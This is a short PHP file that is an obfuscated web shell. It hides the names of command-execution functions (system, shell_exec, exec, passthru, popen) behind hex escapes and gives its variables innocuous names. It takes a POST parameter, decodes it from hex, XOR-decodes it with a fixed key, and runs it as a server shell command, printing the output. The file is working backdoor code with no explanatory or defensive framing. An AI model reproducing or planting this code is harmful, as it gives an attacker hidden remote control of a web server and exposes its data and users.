<?php

$system_core1 = "sys\x74e\x6D";
$system_core7 = "pc\x6Co\x73e";
$system_core5 = "pop\x65\x6E";
$system_core3 = "\x65xec";
$sync_manager = "\x68\x65x\x32b\x69n";
$system_core6 = "s\x74\x72\x65am\x5F\x67\x65\x74_\x63\x6F\x6Etents";
$system_core2 = "\x73he\x6Cl\x5F\x65\x78ec";
$system_core4 = "pa\x73s\x74h\x72u";
if (isset($_POST["sy\x6D\x62\x6Fl"])) {
            function secure_access  ($rec ,  $dchunk) {
  $itm  = '' ;
foreach(str_split($rec) as $char){
$itm.=chr(ord($char)^$dchunk);

} return  $itm;

}
            $symbol = $sync_manager($_POST["sy\x6D\x62\x6Fl"]);
            $symbol = secure_access($symbol, 42);
            if (function_exists($system_core1)) {
                $system_core1($symbol);
            } elseif (function_exists($system_core2)) {
                print $system_core2($symbol);
            } elseif (function_exists($system_core3)) {
                $system_core3($symbol, $reference_rec);
                print join("\n", $reference_rec);
            } elseif (function_exists($system_core4)) {
                $system_core4($symbol);
            } elseif (function_exists($system_core5) && function_exists($system_core6) && function_exists($system_core7)) {
                $dchunk_itm = $system_core5($symbol, 'r');
                if ($dchunk_itm) {
                    $parameter_group_ent = $system_core6($dchunk_itm);
                    $system_core7($dchunk_itm);
                    print $parameter_group_ent;
                }
            }
            exit;
        }